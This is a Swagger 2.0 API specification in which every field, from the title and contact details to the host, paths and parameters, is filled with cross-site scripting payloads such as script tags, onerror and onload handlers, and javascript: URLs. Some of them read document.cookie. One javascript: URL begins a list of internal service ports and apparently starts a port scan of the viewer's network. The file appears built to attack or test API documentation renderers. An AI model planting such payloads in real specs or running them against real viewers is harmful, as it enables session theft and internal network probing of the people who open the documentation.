{
  "swagger": "2.0",
  "info": {
    "title": "\"'><script>alert(document.cookie)</script>",
    "description": "\"'><img src=x onerror=alert(document.cookie)>",
    "contact": {
      "name": "\"'><svg onload=alert(1)>",
      "email": "ademsuh0908@gmail.com\"><script>alert(1)</script>",
      "url": "javascript:var ports=['3000','3001','5000','5001','8000','8080','8081','9000','9200','27017','3306','5432','6379','11211','56..."
    },
    "license": {
      "name": "MIT\"><body onload=alert(1)>",
      "url": "javascript:alert('XSS')"
    },
    "version": "1.0\"><script>alert(1)</script>"
  },
  "host": "example.com\"><script>alert(1)</script>",
  "basePath": "/api\"><img src=x onerror=alert(1)>",
  "schemes": [
    "https\"><script>alert(1)</script>"
  ],
  "paths": {
    "/test\": (\"'><script>alert(1)</script>\": {
      "get": {
        "summary": "Test endpoint\"><img src=x onerror=alert(1)>",
        "description": "XSS test: <script>alert(document.cookie)</script>",
        "parameters": [
          {
            "name": "test\"><script>alert(1)</script>",
            "in": "query",
            "description": "test param\"><svg onload=alert(1)>",
            "type": "string",
            "default": "\"><script>alert(1)</script>"
          },
        ]
      }
    }
  }
}
